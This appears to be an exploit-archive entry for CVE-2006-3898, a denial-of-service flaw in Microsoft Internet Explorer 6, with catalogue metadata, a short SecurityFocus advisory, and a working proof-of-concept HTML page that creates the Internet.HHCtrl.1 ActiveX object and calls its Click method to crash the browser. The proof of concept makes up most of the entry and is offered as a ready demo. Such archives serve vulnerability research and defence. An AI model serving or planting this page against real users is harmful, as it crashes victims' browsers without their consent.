Microsoft Internet Explorer 6 - Internet.HHCtrl Click Denial of Service

Author: Alex F
type: dos
platform: windows
port: 
date_added: 2006-07-22 
date_updated: 2013-09-13 
verified: 1 
codes: CVE-2006-3898;OSVDB-27231 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/19109/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

<html><body><script>

// MoBB Demonstration
function Demo() {
	var a = new ActiveXObject("Internet.HHCtrl.1");
	a.Click();
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>

</body></html>